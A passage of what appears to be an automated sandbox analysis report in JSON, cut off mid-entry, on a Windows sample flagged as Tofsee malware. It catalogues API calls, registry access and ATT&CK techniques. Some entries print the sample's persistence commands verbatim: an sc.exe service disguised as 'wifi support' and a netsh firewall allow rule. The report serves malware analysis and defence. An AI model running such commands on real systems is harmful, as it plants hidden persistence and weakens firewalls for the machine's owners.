\"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000e80010020000000000000000000000000000000000000500e300100200000000000000000000087023000000000020000000000000000000000078492500f86c2300186e2300b8c82500c071230000000000ccf953000000000028fc530095e1a677a3142500feffffffff2baa779a2aaa7764c53e76b69faa77000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c53e76b8c8250064c53e76 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e8000fce2120080f44f77000080000000000089f44f778d77b0240200000070e312006ce3120064e2120068e2120018e4120095e1a677a3142500c0e21200c83a597734e31200d58c517770e3120004e3120042a44f77a802597744e31200d2f44f77080000006ef54f7744f54f773576b0240200000070aa9b6f0000130026bb9b6f18e31200020000000000130070aa9b6f48e3120042a44f77a80259778ce3120010a99b6f08000000e6a89b6fb5f789260200000070aa9b6f0000130026bb9b6fac0e8000780e800058e312008050a76f18e41200f9f29f6fd1bc0049 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000008ab69c7c0300000044e56b0116f0c925801500008ce56b01c0e46b01590000000300000048e46b0150e46b0118e66b0150b8646cb29bc448feffffff98e56b016fe4636c8ab69c7c98e56b017ce4636c060000000000a96a010000008fe4636c3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56b01000000008e00000044e66b01feffffffcce56b01cf00ab77d600ab777fede4768e0000004700000044e66b0100000000a0e56b010000000008e66b01 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360048fe522744de6b016d82297674872b0004010000 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000660030006500650062003300300039003900300030003200380036006100610065006600300033003500650038003300390037003400610062003400300033003500320036006100660031006100640033003700310036006100310039003400620066002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2baa7743c0e476d8ebf275ac0123000000230000000000000000000000ffffc5000000000000000000000000000000000000000100f700c500000000000000000000000870230000000000200000000000000000000000 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002300a8ef2d00000000003e00003e340000c0d0f12d0048052e00f0a62d00f00100000000230004000000a8ef2d00acee6b010464aa7738012300e063aa771fe6e4760000000000002300b0ef2d006dd13a772bafc9256caeda750000000000000000f001000048052e00d82f23000100000000002300500123000c000000b0ef2d00d82f2300020000021800000054210075820000000000000000000000030000004cee6b01820000007f070000000000005421007502000000c075427748052e0000000000c075427768ee6b01e830230000000000d82f2300c0ee6b01ff2baa77 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000df16c3ee0300000044e56b0116f0c925b01500008ce56b01c0e46b015b0000000300000048e46b0150e46b0118e66b0150b8646cb29bc448feffffff98e56b016fe4636cdf16c3ee98e56b017ce4636c820500000000a96a010000008fe4636c3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002300e0182e000000000038000038340000c0081b2e0050132e00f0922a00c00100000000230000000010e0182e00acee6b010464aa7738012300e063aa771fe6e4760000000000002300e8182e006dd13a772bafc9256caeda750000000000000000fc00000050132e00500123000100000000002300500123000c000000e8182e00500123000200000218000000820000827c0000000000000000000000030000004cee6b01800000000200000000000000f22600d47c000000c075427758e82e0000000000c075427768ee6b01fc2f230000000000d82f2300c0ee6b01ff2baa77 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000fbcbbced0300000044e56b0116f0c9257c1400008ce56b01c0e46b015b0000000300000048e46b0150e46b0118e66b0150b8646cb29bc448feffffff98e56b016fe4636cfbcbbced98e56b017ce4636c820500000000a96a010000008fe4636c3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004580)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"IsWow64Process\" with parameter \"4580\" - (UID: 00000000-00004580)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004580)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00004580-52684-269-0040B211\n Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00005776-58521-273-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004152)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"hdvvshgu.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004152)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00004580)\n \"cmd.exe\" called \"FindNextFileW\" with parameter hdvvshgu.exe (UID: 00000000-00004648)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hdvvshgu.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"hdvvshgu.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000600000062c85ba11cc300000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d32db767af33b7670000000000000000\" - (UID: 00000000-00006128)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"2861d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"980876\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004152)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004152)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"hdvvshgu.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TPXHOIKO\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hdvvshgu.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" claimed CRC 231695 while the actual is CRC 15362492\n \"hdvvshgu.exe\" claimed CRC 231695 while the actual is CRC 5285231", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hdvvshgu.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"hdvvshgu.exe.67B73BFE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"hdvvshgu.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\hdvvshgu.exe]- [targetUID: 00000000-00004580]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" has section name .text with entropy \"6.63010280368\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" has section name .text with entropy \"7.97285529131\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" has section name .reloc with entropy \"6.22149605003\"\n \"hdvvshgu.exe\" has section name .text with entropy \"6.63010280368\"\n \"hdvvshgu.exe\" has section name .text with entropy \"7.97285529131\"\n \"hdvvshgu.exe\" has section name .reloc with entropy \"6.22149605003\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00004580)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-0", "type": 13, "relevance": 9, "name": "YARA signature match", "description": "YARA signature \"MALWARE_Win_Tofsee\" matched process \"00000000-00004580\" as \"Detects Tofsee\" (Author: ditekSHen)\n YARA signature \"MALWARE_Win_Tofsee\" matched process \"00000000-00005776\" as \"Detects Tofsee\" (Author: ditekSHen)", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (UID: 00000000-00004580)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00005596)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\hdvvshgu.exe\" %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00004648)\n Spawned process \"sc.exe\" with commandline \"create tpxhoiko binPath= \"%WINDIR%\\\\system32\\\\tpxhoiko\\\\hdvvshgu.exe /d\\\\\"C:\\\\5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00005332)\n Spawned process \"sc.exe\" with commandline \"description tpxhoiko \"wifi internet conection\"\" (UID: 00000000-00005808)\n Spawned process \"sc.exe\" with commandline \"start tpxhoiko\" (UID: 00000000-00005676)\n Spawned process \"hdvvshgu.exe\" with commandline \"/d\"C:\\\\5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\"\" (UID: 00000000-00005776)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004152)\n Spawned process \"svchost.exe\" (UID: 00000000-00006128)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" wrote 52 bytes to a remote process 